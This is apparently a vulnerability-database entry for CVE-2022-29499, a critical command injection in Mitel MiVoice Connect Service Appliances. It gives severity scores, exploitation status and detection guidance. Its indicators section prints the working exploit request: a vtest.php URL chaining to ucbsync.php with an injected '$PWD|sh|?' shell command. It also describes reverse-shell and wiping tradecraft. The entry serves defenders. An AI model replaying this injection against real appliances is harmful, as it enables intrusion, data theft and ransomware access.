cbcvebase.
CVE-2022-29499
published 2022-04-26


Priority: P1 · 95 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · Ransomware
CISA Known Exploited Vulnerability, due 2022-07-18
Exploited in the wild
EPSS: 56.97% (98.9th percentile)
The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.

Affected

1 range
Vendor   Product          Version range     Fixed in
mitel    mivoice_connect  <= 22.20.2300.0   (none listed)

Detection & IOCs (extracted from sources)

url: GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1
path: /scripts/vtest.php
path: /ucbsync.php
command: cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|?
  • The exploit targets the `get_url` parameter in `/scripts/vtest.php` on Mitel MiVoice Connect appliances, chaining through `/ucbsync.php` with a `syncfile` command that injects shell commands via `$PWD|sh|?` to achieve RCE and establish a reverse shell.
  • Threat actor performed anti-forensic wiping using `dd` to overwrite disk space and `rm` to delete files from the VOIP device filesystem after detection; look for `dd` writing to `/tmp/2` and mass `rm` activity on Mitel appliances.
  • Post-exploitation tools Chisel and FileZilla were used by Lorenz actors for pivoting, tunneling, and data exfiltration after gaining initial access via CVE-2022-29499.
  • Check Point IPS signature 'Mitel MiVoice Connect Command Injection (CVE-2022-29499)' can be used as a detection reference for network-level detection of exploit attempts.
  • The responses to the outbound exploit requests demonstrated that the attacker used the exploit to create a reverse shell; monitor Mitel appliances for unexpected outbound connections following requests to `/scripts/vtest.php` or `/ucbsync.php`.
  • The IP addresses shown in the exploit log entries (1.1.256.1 and 2.2.256.2) are invalid/obfuscated addresses used in the CrowdStrike write-up for redaction purposes and are NOT real attacker infrastructure IOCs.
  • Affected products are specifically the Service Appliance (SA) components: SA 100, SA 400, and Virtual SA in Mitel MiVoice Connect through version 19.2 SP3; scope detection rules accordingly.

CVSS provenance

nvd        v3.1   9.8   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0   10.0  CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck         9.8   CRITICAL
cisa              9.8   CRITICAL